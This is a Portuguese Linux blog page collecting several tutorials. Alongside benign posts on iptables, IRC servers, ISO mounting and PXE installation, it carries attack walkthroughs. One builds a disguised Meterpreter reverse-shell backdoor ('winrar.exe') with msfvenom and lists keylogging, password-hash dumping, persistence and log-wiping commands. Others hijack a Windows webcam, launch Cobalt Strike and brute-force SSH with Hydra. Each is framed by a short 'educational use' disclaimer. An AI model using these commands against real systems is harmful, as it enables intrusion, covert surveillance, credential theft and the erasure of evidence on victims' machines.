Linux em Geral

Linux em Geral

Linux em todos os seus sabores

Invadindo com CobaltStrike ( kali Linux )

2

Boas Users!

Hoje irei mostrar como acessar um computador “windows” com o CobaltStrike

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos utilizados:

$ cd

cd= Navegar entre os diretórios

$ sudo ./teamserver 127.0.0.1 123456

sudo= Permissão de super usuário

./teamserver= Iniciando servidor do cobalt strike

127.0.0.1= IP LoopBack

123456= Senha

$ sudo ./cobaltstrike

./cobaltstrike= Iniciando o cobaltstrike

 

Fonte:

https://www.cobaltstrike.com/features

Softwares usados:

CobaltStrike

Toycon

Resource Hacker

 

By user777

Invadindo Webcam conectada no windows com “Kali Linux”

3

Boas Users!

Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.

 

Comandos usados no acesso;

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

webcam_list

webcam_list= mostra se tem alguma webcam conectada

webcam_list

webcam_stream= abre a webcam remota, localmente

 

By user777

 

Invadindo Computador com kali Linux

5

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777

 

Hydra – Brute Force – Realizando pequeno ataque de força bruta.

1

Bom , neste pequeno Artigo vamos entender de forma básica o funcionamento do Hydra.
Para isso, me conectei ao meu kali linux de forma remota na porta ssh e procedi com todos os passos usados para se fazer um ataque de brute force, lembrando que o fato de estar conectado via ssh não me impede de usar os programas que rodam em modo terminal, impediria de usar os pacotes que necessitem de uma interface gráfica para tal.
Bom, é importante ressaltar que estou usando um ambiente de testes, o “host alvo” é de minha propriedade e este post serve apenas paras fins de analise e estudo, não fazendo apologia a invasão. Também não me responsabilizarei por eventuais danos causados a terceiros pelo uso incorreto dessa ferramenta..

 

Aqui temos a versão do Kali que estou rodando.

Bom, o Hydra como muitos conhecem é um programa open source disponibilizado nativamente no Kali Linux, tendo também o codigo fonte disponível para download no repositório oficial do projeto. E quanto a instalação do pacote, esta não será abordada nestas minhas pequenas linhas de raciocinio.

Quem quiser saber mais sobre o Hydra pode diretamente no terminal rodar o man do programa, bastando para isso…

root@love:~# man hydra

Ele dará todas as informações necessárias para que você o conheça melhor, podendo assim planejar e executar diferentes ataques.

Neste exemplo usei como alvo uma Routerboard 433AH rodando Router OS e com usuário previamente cadastrado. Falando em hydra, é sempre interessante ter, pelo menos, o nome de usuário que será usado durante o ataque.
A senha cadastrada foi incluída no nosso arquivo de senhas, qual será usado pelo hydra para realizar os testes de login e assim verificar o password correto.

Bom, vamos ao que realmente interessa. De posse do seu Terminal, crie um arquivo onde você possa inserir prováveis senhas(veja, estamos trabalhando com prováveis senhas , aquelas que imaginamos ser usadas pelo usuario vitima do ataque.) para que possamos realizar nosso pequeno e singelo ataque.
No Terminal, crie então um arquivo, o nome pode ser qualquer um.

root@love:~# nano pass.txt

Neste arquivo insira as senhas, caso use uma lista pre definida.

 

Após termos nossa base de dados de password já pronta, vamos então verificar quais serviços o nosso host vitima está rodando, quais portas estão abertas e que possam ser testadas pelo Hydra.

root@love:~# nmap -v 10.2.2.1

Constatada as portas abertas, podemos prosseguir com nosso propósito, atacar e obter o password.
Então, vamos invocar o Hydra de forma a usar o arquivo “pass.txt” como base para as senhas.

root@love:~# hydra -l kali -P pass.txt 10.2.2.1 ssh


Explicando a linha:
Hydra: invocamos o programa a ser executado, no caso obviamente o Hydra.
O menos L minusculo “-l” especifica login(vide man hydra).
Kali= Nome do usuário a ser testado (como disse acima, user previamente cadastrador por mim)
O “-P” maiúsculo especifica um arquivo contendo senhas, caso fosse “-p” minúsculo poderíamos especificar somente um password por vez.
Pass.txt é obviamente nosso arquivo com as passwords.
10.2.2.1 é o host alvo do ataque e o SSH no final da linha indica o serviço(porta) a ser testada.

Feito isso, basta correr o comando, damos {Enter} e aguardamos que os testes se concluam. Dependendo do tamanho do seu arquivo de senhas e da complexidade isso pode demorar muito tempo… 😉

Olha, que lindo, aqui já podemos ver que o Hydra encontrou o password do usuário Kali. Isso após alguns segundos somente.

Vamos fazer um teste via ssh?

Pronto, conectado…!
Realmente funciona, e realmente da para fazer ataques de níveis bem diferentes deste, por exemplo, caso eu quisesse testar também uma serie de senhas para o protocolo(serviço ftp) bastava a mim mudar ou especificar no fim da linha onde invoco o Hydra o serviço, para um ftp teríamos:

 

root@love:~# hydra -l kali -P passftp.txt 10.2.2.1 ftp

Bom amigos, por hoje e só por hoje é só! Hehe
O hydra é um velho companheiro, e se vocẽ quiser realmente aprender sobre ele não se esqueça de ler a man do programa, não existe tutorial/artigo que se compare a qualidade das informações disponíveis lá.

Bloqueio Seletivo Whatsapp usando Iptables

0

Olá, meu nome é Thiago Ferreira e sou um dos colaboradores do PrefiroLinux, hoje mostrarei como podemos executar um bloqueio seletivo  de whatsapp e facebook usando apenas o iptables. Muito útil em ambientes onde se usa proxy transparente e não há  a possibilidade exectuar os devidos bloqueios e liberação pelas ACL’s do squid.
Aqui faremos de uma forma simples que requer apenas o conhecimento dos ips a serem bloqueados , estes se tratando da rede interna. E os ips que serão liberados, no caso apresentado os ips de nível publico.
Aqui deixo o script de forma bem simples, comentada e bem apresentado, inclusive com a notação de que cada comando fará, como o iptables tratará as regras básicas descritas.
Esse conteúdo originalmente foi incluído em minhas rotinas de bloqueio por volta de junho de 2015, após pesquisas feitas principalmente no linuxquestions.org e adaptado as minhas necessidades. Então, para futuras duvidas e buscas a base de busca deve ser o linuxquestions.
Sendo que aqui no nosso fórum temos o devido espaço para quaisquer esclarecimentos, vide;
http://forum.prefirolinux.com

As linhas são auto explicativas,  os comentários devem permanecer com o “#” antes das linhas que não são parte do script afim de evitar quaisquer erro de leitura do bash.

Criem os arquivos, bloqueio_seletivo, ipsliberados e ipsinterno

$nano /usr/share/bloqueio_seletivo
e dentro dele insira o seguinte script


Na lista de ipsliberados entre com os ips disponiveis no proprio site do whatsapp: https://www.whatsapp.com/cidr.txt .
Basta adicionar a lista a um arquivos em “/usr/share” :
$nano /usr/share/ipsliberados
Como exemplo, poderiamos ter uma serie de ips nessa ordem:

31.13.58.55
31.55.44.77
178.88.14.100

Adicione os ips, e crie um novo arquivo para inserirmos os ips da rede interna:

$nano /usr/share/ipsinterno

Em ipsinterno insiram os ips da sua rede, lembrando de seguir a seguinte regra.
Ips que serão bloqueados devem conter o “#” antes, pois o cut fará a leitura levando em consideração que esses são os unicos que devem ser tratados.
#10.10.10.44
#10.10.10.24
10.10.10.8
No caso acima, somente os dois primeiros serão bloqueados de acessar os serviços dos “ipsliberados”,  o “10.10.10.8” terá total acesso ao trafego.

Caso deseje, liste apenas os ips permitidos, sem a necessidade de usar o “#” antes do ip, ficando assim:
10.10.10.55
10.10.10.22

Aqui um exemplo do script limpo e sem comentarios…

Lembrem-se, leia todo o conteúdo do post inclusive do script para melhor entendimento.
Suporte no forum do prefirolinux.
Boa diversão

 

 

Instalando “IRSSI” no kali linux cliente IRC

0

Boas Users!

Vamos instalar um cliente IRC, comunicação via terminal no kali linux.

1- abra o terminal e execute;

#apt-get install irssi

2- execute o irrsi no terminal;

#irssi

Captura de tela de 2016-07-21 01-06-40

3- Em seguida execute o comando abaixo para conectar a um servidor do irc;

/server freenode.net

OBS: usei o servidor da freenode como exemplo, você pode se conectar a qualquer servidor do IRC.

Captura de tela de 2016-07-21 01-14-52

4-Agora entraremos em uma sala ou também podemos criar uma sala se caso ela nao esteja criada, com o seguinte comando;

/join prefirolinux

Captura de tela de 2016-07-21 01-15-13

Pronto, nesse momento você certamente estará conectado a uma sala do IRC, para saber mais sobre os comandos acesse esse link e boa diversão.

 

 

By user777

 

 

 

 

 

 

 

Criando Servidor IRC no Kali Linux “InspiRCD”

0

Boas Users!

Vamos instalar o InspIRCd no kali

1- Basta abrir o terminal e inserir o seguinte comando;

#apt-get install inspircd

2-  Agora à configuração. Para tal vamos abrir o ficheiro /etc/inspircd/inspircd.conf onde devem realizar as seguintes configurações:

OBS: usarei o editor de texto “vi”, você poderá usar o editor de texto de seu gosto.

#vi /etc/inspircd/inspircd.conf

Ao nível do servidor, devem alterar os seguintes dados:

Server name
Description
Network

Configure de acordo com suas informações.

Captura de tela de 2016-07-21 00-25-10
3- Ao nível da administração,  devem  alterar os seguintes dados de acordo com a conta que pretendam criar.
Admin
Nick
Email
Captura de tela de 2016-07-21 00-25-30
4- Em termos de servidor, devem também indicar a partir de qual endereço é que o mesmo está disponível. No exemplo da imagem seguinte, consideramos o endereço 177.154.11.100 e porta 6667.
Captura de tela de 2016-07-21 00-25-50
5- O próximo passo é definir uma password  necessária para parar ou reiniciar o serviço.
Captura de tela de 2016-07-21 00-26-19
6- Vamos agora criar um conta de operador. Para tal basta procurarem pela linha que começa por <oper name=…, dentro do ficheiro de configuração.
Captura de tela de 2016-07-21 00-26-46
7- salve o arquivo e iniciei o serviço usando o comando
#service inspircd start

Estas são as configurações mínimas para que o InspIRCd funcione. No entanto há muitos outros parâmetros que podem ser consultados aqui.

Solução para o erro “Nenhuma unidade de CD-ROM comum foi detectada” Kali linux

0

Boas Users!

 

Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:

erro kali

 

1– esse erro ocorre geralmente, com pendrive.

2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.

3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.

4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.

5–  se estiver no linux, Primeiro acesse o terminal como root:

su

Agora vamos acessar o /media:

# cd /media

E então crie um diretório onde deverá ser armazenado a nossa ISO:

# mkdir /diretorio_ISO

Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:

# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop

 

 

By user777

Instalação Debian e derivados via PXE [ live e install network pxe debian]

0
Pxe install

 

Instalando uma distribuição Linux via PXE, totalmente OFFLINE, sem uso de internet para baixar qualquer arquivo que não seja a imagem completa(full) do sistema, nada de ficar baixando pacotes durante a instalação!!!…
Administrar grandes quantidades de computadores nem sempre é uma tarefa fácil, por exemplo, quando se tem que formatar ou atualizar um grande numero de maquinas, mas que de certa forma implique na dificuldade de ter que fazer em maquina por maquina.
Esta solução foi testada amplamente em varias versões de S.O derivados do Ubuntu, como Xubuntu, Kubuntu, Ubuntu Server e o próprio Ubuntu .